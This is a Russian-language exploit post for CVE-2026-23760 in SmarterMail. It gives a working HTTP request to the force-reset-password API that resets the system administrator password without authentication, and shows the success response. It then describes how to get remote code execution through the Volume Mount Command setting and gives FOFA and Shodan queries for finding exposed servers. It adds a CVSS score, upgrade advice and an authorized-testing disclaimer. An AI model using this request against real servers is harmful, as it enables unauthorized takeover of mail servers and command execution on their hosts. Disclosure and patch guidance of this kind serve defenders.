
CVE-2026-23760 — Обход аутентификации через API сброса пароля в SmarterMail.
Proof-of-concept, эксплуатирующий обход аутентификации через API сброса пароля для учётной записи системного администратора SmarterMail.
Уязвимость обусловлена обходом аутентификации в API сброса пароля. Конечная точка force-reset-password допускает анонимные запросы и не проверяет существующий пароль или токен сброса при сбросе пароля учётных записей системного администратора.
PoC выглядит настолько просто:
POST /api/v1/auth/force-reset-password HTTP/1.1
Host: xxxxxxx:9998
Content-Type: application/json
Content-Length: 145
{"IsSysAdmin":"true",
"OldPassword":"watever",
"Username":"admin",
"NewPassword":"NewPassword123!@#",
"ConfirmPassword": "NewPassword123!@#"}
Вы должны получить следующий ответ, который подтверждает, что пароль был успешно изменён:
{
"username":"",
"errorCode":"",
"errorData":"",
"debugInfo":"check1\\r\\ncheck2\\r\\ncheck3\\r\\ncheck4.2\\r\\ncheck5.2\\r\\ncheck6.2\\r\\ncheck7.2\\r\\ncheck8.2\\r\\n",
"success":true,
"resultCode":200
}
Единственное оставшееся требование — знать имя пользователя учётной записи администратора.
После аутентификации в качестве системного администратора злоумышленник может:
Settings -> Volume Mounts.Volume Mount Command.Эта команда выполняется базовой операционной системой. На этом этапе злоумышленник достигает полного удалённого выполнения кода на хосте.
Когда конфигурация сохраняется, указанная команда выполняется немедленно.
Nuclei-Template:
https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2026/CVE-2026-23760.yaml
FOFA:
title='SmarterMail'
SHODAN:
html:'SmarterMail'
Неаутентифицированный удалённый злоумышленник может обойти аутентификацию для учётной записи системного администратора и получить доступ. После аутентификации он может выполнить полное удалённое выполнение кода на хосте.
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N - 9.3:Критический
Обновитесь до последней версии: https://www.smartertools.com/smartermail/downloads
Этот инструмент предназначен только для авторизованного тестирования безопасности. Несанкционированный доступ к компьютерным системам является незаконным.